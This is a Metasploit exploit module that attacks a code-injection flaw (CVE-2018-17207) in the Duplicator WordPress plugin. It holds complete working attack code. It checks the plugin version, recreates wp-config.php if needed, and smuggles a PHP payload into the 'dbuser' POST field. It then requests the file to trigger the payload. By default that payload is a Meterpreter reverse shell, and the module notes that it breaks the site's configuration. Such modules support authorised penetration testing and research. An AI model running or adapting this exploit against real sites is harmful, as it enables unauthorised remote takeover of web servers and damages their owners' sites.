metasploit-gs/modules/exploits/multi/php/wordpress_duplicator.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Snapcreek Duplicator WordPress plugin installer.php code injection',
      'Description'     => %q{
        When the WordPress plugin Duplicator restores a backup, it leaves dangerous files in the filesystem such as
        installer.php and installer-backup.php. These files allow anyone to call a function that overwrite the wp-config.php file
        AND this function does not sanitize POST parameters before inserting them inside the wp-config.php file, leading to
        arbitrary PHP code execution.
        WARNING: This exploit WILL break the wp-config.php file. If possible try to restore backups of the configuration after the exploit
        to make the WordPress site work again.
      },
      'Author'          => [ 'Julien Legras <julien.legras@synacktiv.com>', 'Thomas Chauchefoin <thomas.chauchefoin@synacktiv.com>' ],
      'References'     => [
        ['URL', 'https://www.synacktiv.com/ressources/advisories/WordPress_Duplicator-1.2.40-RCE.pdf'],
        ['WPVDB', '9123'],
        ['CVE', '2018-17207']
      ],
      'License'         => MSF_LICENSE,
      'Privileged'      => false,
      'DisclosureDate'  => 'Aug 29 2018',
      'DefaultOptions'  =>
      {
        'PAYLOAD' => 'php/meterpreter/reverse_tcp'
      },

      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['WordPress Duplicator <= 1.2.40', {}]],
      'DefaultTarget'   => 0))

    register_options([
      OptString.new('TARGETURI', [true, "The TARGETURI where installer.php or installer-backup.php is located", "/installer.php"]),
      ])
  end

  def check
    tpath = normalize_uri(datastore['TARGETURI'])

    print_status("Checking uri #{rhost+tpath}")
    response = send_request_raw({ 'uri' => tpath})
    version = response.body.to_s.scan( /version: ([^<]*)</).last.first
    return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new("1.2.40")
    vprint_error("Server responded with #{response.code}")
    return Exploit::CheckCode::Safe

  end

  def exploit
    payload_oneline = payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")

    print_status("Checking if the wp-config.php file already exists...")
    tpath_wp_config = normalize_uri(datastore['TARGETURI'] + '/../wp-config.php')
    response = send_request_cgi({ 'uri' => tpath_wp_config})

    if response.code == 404 # we have to perform action_step 2 to create the wp-config.php file.
      print_status("This WordPress was not restored. Creating the wp-config.php file...")
      # 1. GET the installer.php to retrieve the archive name.
      response = send_request_cgi({'uri' => normalize_uri(datastore['TARGETURI'])})
      archive_name = response.body.to_s.scan( /value="([^"]*.zip)"/)
      if archive_name.length > 0
        archive_name = archive_name.first.first
        # 2. Perform the 1st step to actually create the wp-config.php file.
        response = send_request_cgi({
          'method' => 'POST',
          'uri'    => normalize_uri(datastore['TARGETURI']),
          'vars_post'   => {
            'action_ajax' => "1",
            'action_step' => "1",
            'archive_name' => archive_name,
            'archive_engine' => "ziparchive",
            'exe_safe_mode' => "0",
            'archive_filetime' => "current",
            'logging' => "1"
          }
        })
        if response.code == 200
          print_status("Successfully created the wp-config.php file!")
        else
          print_error("The archive file #{archive_name} was probably deleted.")
          return
        end
      else
        print_error("Failed to retrieve the archive name, cannot create the wp-config.php file")
        return
      end
    end

    # 2. Exploit the code injection.
    print_status("All good! Injecting PHP code in the wp-config.php file...")
    response = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(datastore['TARGETURI']),
      'vars_post'   => {
        'action_ajax' => "3",
        'action_step' => "3",
        'dbhost' => rand_text_alphanumeric(20),
        'dbname' => rand_text_alphanumeric(20),
        'dbpass' => rand_text_alphanumeric(20),
        'dbuser' => "');" + payload_oneline + "/*",
        'dbport' => rand_text_numeric(5)
      }
    })

    print_status("Requesting wp-config.php to execute the payload...")
    response = send_request_cgi({ 'uri' => tpath_wp_config})
  end
end